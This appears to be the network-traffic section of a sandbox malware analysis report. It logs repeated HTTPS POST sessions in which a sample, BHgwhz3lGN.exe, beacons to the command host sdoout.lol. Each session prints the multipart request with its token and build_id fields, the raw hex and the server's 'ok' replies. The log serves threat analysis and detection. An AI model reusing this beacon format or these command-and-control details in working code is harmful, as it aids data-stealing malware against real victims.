                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          82192.168.2.954014116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:30 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----asjwlxlfkfukfusjmym7
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1829
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:30 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 61 73 6a 77 6c 78 6c 66 6b 66 75 6b 66 75 73 6a 6d 79 6d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 61 73 6a 77 6c 78 6c 66 6b 66 75 6b 66 75 73 6a 6d 79 6d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 61 73 6a 77 6c 78 6c 66 6b 66 75 6b 66 75 73 6a 6d 79 6d 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------asjwlxlfkfukfusjmym7Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------asjwlxlfkfukfusjmym7Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------asjwlxlfkfukfusjmym7Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:30 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          83192.168.2.954015116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:31 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----fknyctj5p8q1vas00r9r
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1829
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:31 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 66 6b 6e 79 63 74 6a 35 70 38 71 31 76 61 73 30 30 72 39 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 66 6b 6e 79 63 74 6a 35 70 38 71 31 76 61 73 30 30 72 39 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 66 6b 6e 79 63 74 6a 35 70 38 71 31 76 61 73 30 30 72 39 72 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------fknyctj5p8q1vas00r9rContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------fknyctj5p8q1vas00r9rContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------fknyctj5p8q1vas00r9rCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:31 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          84192.168.2.954017116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:32 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----hlfctr90h47g4e3wbai5
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:32 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 68 6c 66 63 74 72 39 30 68 34 37 67 34 65 33 77 62 61 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 68 6c 66 63 74 72 39 30 68 34 37 67 34 65 33 77 62 61 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 68 6c 66 63 74 72 39 30 68 34 37 67 34 65 33 77 62 61 69 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------hlfctr90h47g4e3wbai5Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------hlfctr90h47g4e3wbai5Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------hlfctr90h47g4e3wbai5Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:32 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          85192.168.2.954018116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:33 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----as00r1vaa1vsjmo89zm7
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:33 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 61 73 30 30 72 31 76 61 61 31 76 73 6a 6d 6f 38 39 7a 6d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 61 73 30 30 72 31 76 61 61 31 76 73 6a 6d 6f 38 39 7a 6d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 61 73 30 30 72 31 76 61 61 31 76 73 6a 6d 6f 38 39 7a 6d 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------as00r1vaa1vsjmo89zm7Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------as00r1vaa1vsjmo89zm7Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------as00r1vaa1vsjmo89zm7Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:33 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          86192.168.2.954019116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:34 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----mycjw47qi5fcbaimgln7
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1829
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:34 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 6d 79 63 6a 77 34 37 71 69 35 66 63 62 61 69 6d 67 6c 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6d 79 63 6a 77 34 37 71 69 35 66 63 62 61 69 6d 67 6c 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6d 79 63 6a 77 34 37 71 69 35 66 63 62 61 69 6d 67 6c 6e 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------mycjw47qi5fcbaimgln7Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------mycjw47qi5fcbaimgln7Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------mycjw47qi5fcbaimgln7Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:34 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          87192.168.2.954020116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:35 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----kfknglngvkngv3e3wlfk
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:35 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 6b 66 6b 6e 67 6c 6e 67 76 6b 6e 67 76 33 65 33 77 6c 66 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6b 66 6b 6e 67 6c 6e 67 76 6b 6e 67 76 33 65 33 77 6c 66 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6b 66 6b 6e 67 6c 6e 67 76 6b 6e 67 76 33 65 33 77 6c 66 6b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------kfknglngvkngv3e3wlfkContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------kfknglngvkngv3e3wlfkContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------kfknglngvkngv3e3wlfkCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:35 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          88192.168.2.954021116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:36 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----p8y58glxbsr9zukxtjek
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:36 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 70 38 79 35 38 67 6c 78 62 73 72 39 7a 75 6b 78 74 6a 65 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 70 38 79 35 38 67 6c 78 62 73 72 39 7a 75 6b 78 74 6a 65 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 70 38 79 35 38 67 6c 78 62 73 72 39 7a 75 6b 78 74 6a 65 6b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------p8y58glxbsr9zukxtjekContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------p8y58glxbsr9zukxtjekContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------p8y58glxbsr9zukxtjekCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:36 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          89192.168.2.954025116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:37 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----z5x4o8qq9hvkfu3ecbiw
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:37 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 7a 35 78 34 6f 38 71 71 39 68 76 6b 66 75 33 65 63 62 69 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 7a 35 78 34 6f 38 71 71 39 68 76 6b 66 75 33 65 63 62 69 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 7a 35 78 34 6f 38 71 71 39 68 76 6b 66 75 33 65 63 62 69 77 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------z5x4o8qq9hvkfu3ecbiwContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------z5x4o8qq9hvkfu3ecbiwContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------z5x4o8qq9hvkfu3ecbiwCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:37 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          90192.168.2.954026116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:38 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----o8qq168q9hvsri5x4ozm
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:38 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 6f 38 71 71 31 36 38 71 39 68 76 73 72 69 35 78 34 6f 7a 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6f 38 71 71 31 36 38 71 39 68 76 73 72 69 35 78 34 6f 7a 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6f 38 71 71 31 36 38 71 39 68 76 73 72 69 35 78 34 6f 7a 6d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------o8qq168q9hvsri5x4ozmContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------o8qq168q9hvsri5x4ozmContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------o8qq168q9hvsri5x4ozmCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:38 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          91192.168.2.954027116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:39 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ct0h4ecjwtj58y589000
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1829
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
